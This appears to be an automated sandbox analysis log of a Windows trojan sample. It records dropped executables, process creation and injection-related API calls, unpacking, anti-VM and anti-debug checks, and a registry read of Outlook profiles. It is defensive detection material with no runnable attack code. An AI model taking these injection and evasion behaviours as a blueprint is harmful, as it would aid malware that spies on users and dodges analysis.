          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_004018303_2_00401830
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_0040C03E3_2_0040C03E
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_004038F33_2_004038F3
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00422A4C3_2_00422A4C
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00401BD03_2_00401BD0
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_004056533_2_00405653
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_004207533_2_00420753
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009BB0903_2_009BB090
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A610023_2_00A61002
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009AF9003_2_009AF900
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009C41203_2_009C4120
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009DEBB03_2_009DEBB0
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B841F3_2_009B841F
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A0D203_2_009A0D20
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A71D553_2_00A71D55
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009C6E303_2_009C6E30
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: String function: 00401980 appears 42 times
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_0041E833 NtAllocateVirtualMemory,3_2_0041E833
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_0041E653 NtCreateFile,3_2_0041E653
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_0041E703 NtReadFile,3_2_0041E703
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_0041E783 NtClose,3_2_0041E783
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E98F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_009E98F0
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9840 NtDelayExecution,LdrInitializeThunk,3_2_009E9840
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9860 NtQuerySystemInformation,LdrInitializeThunk,3_2_009E9860
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E99A0 NtCreateSection,LdrInitializeThunk,3_2_009E99A0
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_009E9910
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_009E9A00
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9A20 NtResumeThread,LdrInitializeThunk,3_2_009E9A20
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9A50 NtCreateFile,LdrInitializeThunk,3_2_009E9A50
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E95D0 NtClose,LdrInitializeThunk,3_2_009E95D0
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9540 NtReadFile,LdrInitializeThunk,3_2_009E9540
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E96E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_009E96E0
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_009E9660
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9780 NtMapViewOfSection,LdrInitializeThunk,3_2_009E9780
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E97A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_009E97A0
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9FE0 NtCreateMutant,LdrInitializeThunk,3_2_009E9FE0
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9710 NtQueryInformationToken,LdrInitializeThunk,3_2_009E9710
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E98A0 NtWriteVirtualMemory,3_2_009E98A0
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9820 NtEnumerateKey,3_2_009E9820
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009EB040 NtSuspendThread,3_2_009EB040
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E99D0 NtCreateProcessEx,3_2_009E99D0
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9950 NtQueueApcThread,3_2_009E9950
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9A80 NtOpenDirectoryObject,3_2_009E9A80
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9A10 NtQuerySection,3_2_009E9A10
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009EA3B0 NtGetContextThread,3_2_009EA3B0
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9B00 NtSetValueKey,3_2_009E9B00
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E95F0 NtQueryInformationFile,3_2_009E95F0
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009EAD30 NtSetContextThread,3_2_009EAD30
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9520 NtWaitForSingleObject,3_2_009E9520
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9560 NtWriteFile,3_2_009E9560
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E96D0 NtCreateKey,3_2_009E96D0
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9610 NtEnumerateValueKey,3_2_009E9610
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9650 NtQueryValueKey,3_2_009E9650
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9670 NtQueryInformationProcess,3_2_009E9670
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009EA710 NtOpenProcessToken,3_2_009EA710
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9730 NtQueryVirtualMemory,3_2_009E9730
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9770 NtSetInformationFile,3_2_009E9770
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009EA770 NtOpenThread,3_2_009EA770
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9760 NtOpenProcess,3_2_009E9760
          Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeReversingLabs: Detection: 42%
          Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeVirustotal: Detection: 42%
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeJump to behavior
          Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeProcess created: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe "C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeProcess created: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeProcess created: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe "C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.mJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeProcess created: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeFile created: C:\Users\user\AppData\Local\Temp\nsjF9DB.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/5@12/10
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeCode function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404AB5
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1240:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: wntdll.pdbUGP source: vfpbkeeo.exe, 00000001.00000003.309270547.000000001A050000.00000004.00001000.00020000.00000000.sdmp, vfpbkeeo.exe, 00000001.00000003.309553217.0000000019EC0000.00000004.00001000.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000003.314888267.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000002.352445837.0000000000A9F000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.351980250.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.353912435.000000000356E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.568214365.000000000381F000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.568214365.0000000003700000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: cmd.pdbUGP source: vfpbkeeo.exe, 00000003.00000002.353773506.0000000002670000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: vfpbkeeo.exe, vfpbkeeo.exe, 00000003.00000003.314888267.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000002.352445837.0000000000A9F000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.351980250.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.353912435.000000000356E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.568214365.000000000381F000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.568214365.0000000003700000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: cmd.pdb source: vfpbkeeo.exe, 00000003.00000002.353773506.0000000002670000.00000040.10000000.00040000.00000000.sdmp

          Data Obfuscation

          barindex
          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeUnpacked PE file: 3.2.vfpbkeeo.exe.400000.0.unpack .text:ER;.rdata:R;.data:W; vs .text:ER;
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 1_2_00410A64 push ecx; ret 1_2_00410A77
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_0040A846 push cs; retf 3_2_0040A847
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00411320 push ds; retf 3_2_00411322
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_0040DC2C pushfd ; iretd 3_2_0040DC3A
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_0040B4FA push ecx; ret 3_2_0040B501
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_0040AD0D push 255F11F9h; retf 3_2_0040AD18
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_0041B674 pushad ; retf 3_2_0041B678
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00401E20 push eax; ret 3_2_00401E22
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009FD0D1 push ecx; ret 3_2_009FD0E4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeFile created: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_1-8897
          Source: C:\Windows\SysWOW64\cmd.exe TID: 5936Thread sleep time: -48000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009D6A60 rdtscp 3_2_009D6A60
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 889Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 862Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 1_2_00A407DA GetSystemInfo,1_2_00A407DA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 1_2_004089B8 FindFirstFileExW,1_2_004089B8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeAPI call chain: ExitProcess graph end nodegraph_0-3480
          Source: explorer.exe, 00000004.00000002.574282998.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @%SystemRoot%\System32\mswsock.dll,-60201-9%SystemRoot%\system32\mswsock.dlle6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&
          Source: explorer.exe, 00000004.00000002.574282998.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000003.446841530.000000000834F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
          Source: explorer.exe, 00000004.00000003.449986076.000000000858E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c9
          Source: explorer.exe, 00000004.00000000.322563528.00000000059F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
          Source: explorer.exe, 00000004.00000000.327263504.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000002.574282998.0000000008394000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.322563528.00000000059F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}SPS
          Source: explorer.exe, 00000004.00000002.576863468.000000000CDEA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&
          Source: explorer.exe, 00000004.00000003.565329897.000000000D009000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.577506261.000000000D009000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
          Source: explorer.exe, 00000004.00000003.451089971.000000000CFB2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.447484524.000000000CFB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000004.00000002.574282998.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 1_2_00401754 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00401754
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 1_2_0040B06F GetProcessHeap,1_2_0040B06F
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009D6A60 rdtscp 3_2_009D6A60
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 1_2_00A4005F mov eax, dword ptr fs:[00000030h]1_2_00A4005F
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 1_2_00A4013E mov eax, dword ptr fs:[00000030h]1_2_00A4013E
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 1_2_00A40109 mov eax, dword ptr fs:[00000030h]1_2_00A40109
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 1_2_00A4017B mov eax, dword ptr fs:[00000030h]1_2_00A4017B
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A9080 mov eax, dword ptr fs:[00000030h]3_2_009A9080
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009DF0BF mov ecx, dword ptr fs:[00000030h]3_2_009DF0BF
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009DF0BF mov eax, dword ptr fs:[00000030h]3_2_009DF0BF
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009DF0BF mov eax, dword ptr fs:[00000030h]3_2_009DF0BF
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A23884 mov eax, dword ptr fs:[00000030h]3_2_00A23884
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A23884 mov eax, dword ptr fs:[00000030h]3_2_00A23884
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E90AF mov eax, dword ptr fs:[00000030h]3_2_009E90AF
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A3B8D0 mov eax, dword ptr fs:[00000030h]3_2_00A3B8D0
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A3B8D0 mov ecx, dword ptr fs:[00000030h]3_2_00A3B8D0
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A3B8D0 mov eax, dword ptr fs:[00000030h]3_2_00A3B8D0
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A3B8D0 mov eax, dword ptr fs:[00000030h]3_2_00A3B8D0
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A3B8D0 mov eax, dword ptr fs:[00000030h]3_2_00A3B8D0
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A3B8D0 mov eax, dword ptr fs:[00000030h]3_2_00A3B8D0
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009BB02A mov eax, dword ptr fs:[00000030h]3_2_009BB02A
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009BB02A mov eax, dword ptr fs:[00000030h]3_2_009BB02A
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009BB02A mov eax, dword ptr fs:[00000030h]3_2_009BB02A
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009BB02A mov eax, dword ptr fs:[00000030h]3_2_009BB02A
